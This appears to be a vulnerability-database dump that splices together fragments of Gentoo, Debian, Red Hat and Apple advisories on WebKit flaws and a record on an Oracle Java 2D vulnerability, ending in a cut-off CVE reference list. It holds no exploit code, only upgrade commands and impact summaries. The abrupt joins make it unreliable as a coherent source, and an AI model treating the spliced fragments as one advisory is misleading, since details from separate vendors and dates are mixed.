Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2023 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
.
For the stable distribution (bullseye), these problems have been fixed in
version 2.38.3-1~deb11u1.
We recommend that you upgrade your wpewebkit packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: webkit2gtk3 security update
Advisory ID: RHSA-2023:0016-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2023:0016
Issue date: 2023-01-04
CVE Names: CVE-2022-42856
====================================================================
1. Summary:
An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
WebKitGTK is the port of the portable web rendering engine WebKit to the
GTK platform.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
webkit2gtk3-2.36.7-1.el8_7.1.src.rpm
aarch64:
webkit2gtk3-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-devel-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-jsc-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.aarch64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.aarch64.rpm
ppc64le:
webkit2gtk3-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-devel-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-jsc-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.ppc64le.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.ppc64le.rpm
s390x:
webkit2gtk3-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-devel-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-jsc-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.s390x.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.s390x.rpm
x86_64:
webkit2gtk3-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-debugsource-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-devel-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-devel-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-jsc-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-jsc-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-jsc-devel-2.36.7-1.el8_7.1.x86_64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.i686.rpm
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2022-42856
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc.
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs
& DNSLab, Korea Univ.
WebKit Bugzilla: 248266
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group
Additional recognition
WebKit
We would like to acknowledge an anonymous researcher, scarlet for
their assistance.
Safari 16.2 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2022-12-13-2 iOS 15.7.2 and iPadOS 15.7.2
iOS 15.7.2 and iPadOS 15.7.2 addresses the following issues.
Information about the security content is also available at
https://support.apple.com/HT213531.
AppleAVD
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Parsing a maliciously crafted video file may lead to kernel
code execution
Description: An out-of-bounds write issue was addressed with improved
input validation.
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov
AVEVideoEncoder
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: A logic issue was addressed with improved checks.
CVE-2022-42848: ABC Research s.r.o
File System
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to break out of its sandbox
Description: This issue was addressed with improved checks.
CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year
Lab
Graphics Driver
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Parsing a maliciously crafted video file may lead to
unexpected system termination
Description: The issue was addressed with improved memory handling.
CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin
IOHIDFamily
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: A race condition was addressed with improved state
handling.
CVE-2022-42864: Tommy Muir (@Muirey03)
iTunes Store
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An issue existed in the parsing of URLs.
CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security
Kernel
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: A race condition was addressed with additional
validation.
CVE-2022-46689: Ian Beer of Google Project Zero
libxml2
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: An integer overflow was addressed through improved input
validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: A remote user may be able to cause unexpected app termination
or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project
Zero
ppp
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to execute arbitrary code with kernel
privileges
Description: The issue was addressed with improved memory handling.
CVE-2022-42840: an anonymous researcher
Preferences
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: An app may be able to use arbitrary entitlements
Description: A logic issue was addressed with improved state
management.
CVE-2022-42855: Ivan Fratric of Google Project Zero
Safari
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Visiting a website that frames malicious content may lead to
UI spoofing
Description: A spoofing issue existed in the handling of URLs.
CVE-2022-46695: KirtiKumar Anandrao Ramchandani
WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory consumption issue was addressed with improved
memory handling.
WebKit Bugzilla: 245466
CVE-2022-46691: an anonymous researcher
WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: The issue was addressed with improved memory handling.
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day
Initiative
WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Processing maliciously crafted web content may bypass Same
Origin Policy
Description: A logic issue was addressed with improved state
management.
WebKit Bugzilla: 246783
CVE-2022-46692: KirtiKumar Anandrao Ramchandani
WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
input validation.
WebKit Bugzilla: 247562
CVE-2022-46700: Samuel Groß of Google V8 Security
WebKit
Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone
SE (1st generation), iPad Pro (all models), iPad Air 2 and later,
iPad 5th generation and later, iPad mini 4 and later, and iPod touch
(7th generation)
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution.
WebKit Bugzilla: 248266
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/ iTunes and Software Update on the
device will automatically check Apple's update server on its weekly
schedule. When an update is detected, it is downloaded and the option
to be installed is presented to the user when the iOS device is
docked. We recommend applying the update immediately if possible.
Selecting Don't Install will present the option the next time you
connect your iOS device. The automatic update process may take up to
a week depending on the day that iTunes or the device checks for
updates. You may manually obtain the update via the Check for Updates
button within iTunes, or the Software Update on your device. To
check that the iPhone, iPod touch, or iPad has been updated: *
Navigate to Settings * Select General * Select About. The version
after applying this update will be "iOS 15.7.2 and iPadOS 15.7.2".
All information is also posted on the Apple Security Updates
web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYIACgkQ4RjMIDke
Nxn07xAA2gJjgY+Ql7WKtXSxsU4snP+8d2zDgD5hKkZVETJrKG1TGwAKK/YdW0Ug
8nmj/DIU+RRsU8KpGLiN4TGsHVot1GaDwwMQ/HCUG4bHFjknc0TqrTkUCfG6rnkh
bFouinoNfyPf7gcmLkQg2AhrNjA/a9QJzfmX2XKtGybIN1kFDd8eMKb/setgVQUS
12h4N6YBI4WjSGvyZ8vagqpMRAz0An4lSEoa21CN1ViM0E4wBWIyU8Ux05fN+Lvn
2gefdjyGV5IP63z3kYe4D/Vt6yatBo1n7ERM9If7IMGO5O8DJqrynTZ3q1kCsxcR
QheJHkPZDF/8ogjAdNiOzqybSzhhcNk0uteTSXX1tYGvRos7GyDSTG6/KjuFvB60
Wohwzr16o6VkcZyaU41cA9dWKrv3+RRTm7UR2/CKGngrjcnm4jAotR+pjtQU444v
ECGQVTx/qat7Eu+IFe2llm8JcjBHjx1R6Rbb8sqmzD4lVDja/aZ2491vsVdOytq+
cZ59nZqwbG7vo8mBow+zEcoKsh8pAGRYoLW3WU1MetNt04V9d+7Fv7wG/+BNkzHN
qOhOa7+4SwD8wvApxdF2+hZgSD26owwkbfG4hnf71w4DSDPpwRC/CoRvhDMZToSl
sPLIWP29jIII09N8TNW3PVlIAjquv7oxir7BohtGu5ioSmgI3fQ=
=wLMf
-----END PGP SIGNATURE-----
|
|
var-201404-0398
|
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. A remote attacker could exploit this vulnerability to execute arbitrary code, affecting the confidentiality, integrity, and availability of data. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201406-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: IcedTea JDK: Multiple vulnerabilities
Date: June 29, 2014
Bugs: #312297, #330205, #340819, #346799, #352035, #353418,
#354231, #355127, #370787, #387637, #404095, #421031,
#429522, #433389, #438750, #442478, #457206, #458410,
#461714, #466822, #477210, #489570, #508270
ID: 201406-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the IcedTea JDK, the worst
of which could lead to arbitrary code execution.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
===========
Multiple vulnerabilities have been discovered in the IcedTea JDK.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
==========
[ 1 ] CVE-2009-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555
[ 2 ] CVE-2010-2548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548
[ 3 ] CVE-2010-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783
[ 4 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 5 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 6 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 7 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 8 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 9 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 10 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 11 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 12 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 13 ] CVE-2010-3564
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564
[ 14 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 15 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 16 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 17 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 18 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 19 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 20 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 21 ] CVE-2010-3860
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860
[ 22 ] CVE-2010-4351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351
[ 23 ] CVE-2010-4448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 24 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 25 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 26 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 27 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 28 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 29 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 30 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 31 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 32 ] CVE-2011-0025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025
[ 33 ] CVE-2011-0706
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706
[ 34 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 35 ] CVE-2011-0822
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822
[ 36 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 37 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 38 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 39 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 40 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 41 ] CVE-2011-0870
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870
[ 42 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 43 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 44 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 45 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 46 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 47 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 48 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 49 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 50 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 51 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 52 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 53 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 54 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 55 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 56 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 57 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 58 ] CVE-2011-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571
[ 59 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 60 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 61 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 62 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 63 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 64 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 65 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 66 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 67 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 68 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 69 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 70 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 71 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 72 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 73 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 74 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 75 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 76 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 77 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 78 ] CVE-2012-3422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422
[ 79 ] CVE-2012-3423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423
[ 80 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 81 ] CVE-2012-4540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540
[ 82 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 83 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 84 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 85 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 86 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 87 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 88 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 89 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 90 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 91 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 92 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 93 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 94 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 95 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 96 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 97 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 98 ] CVE-2012-5979
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979
[ 99 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 100 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 101 ] CVE-2013-0424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424
[ 102 ] CVE-2013-0425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425
[ 103 ] CVE-2013-0426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426
[ 104 ] CVE-2013-0427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427
[ 105 ] CVE-2013-0428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428
[ 106 ] CVE-2013-0429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429
[ 107 ] CVE-2013-0431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431
[ 108 ] CVE-2013-0432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432
[ 109 ] CVE-2013-0433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433
[ 110 ] CVE-2013-0434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434
[ 111 ] CVE-2013-0435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435
[ 112 ] CVE-2013-0440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440
[ 113 ] CVE-2013-0441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441
[ 114 ] CVE-2013-0442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442
[ 115 ] CVE-2013-0443
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443
[ 116 ] CVE-2013-0444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444
[ 117 ] CVE-2013-0450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450
[ 118 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 119 ] CVE-2013-1475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475
[ 120 ] CVE-2013-1476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476
[ 121 ] CVE-2013-1478
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478
[ 122 ] CVE-2013-1480
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480
[ 123 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 124 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 125 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 126 ] CVE-2013-1488
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488
[ 127 ] CVE-2013-1493
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493
[ 128 ] CVE-2013-1500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500
[ 129 ] CVE-2013-1518
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518
[ 130 ] CVE-2013-1537
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537
[ 131 ] CVE-2013-1557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557
[ 132 ] CVE-2013-1569
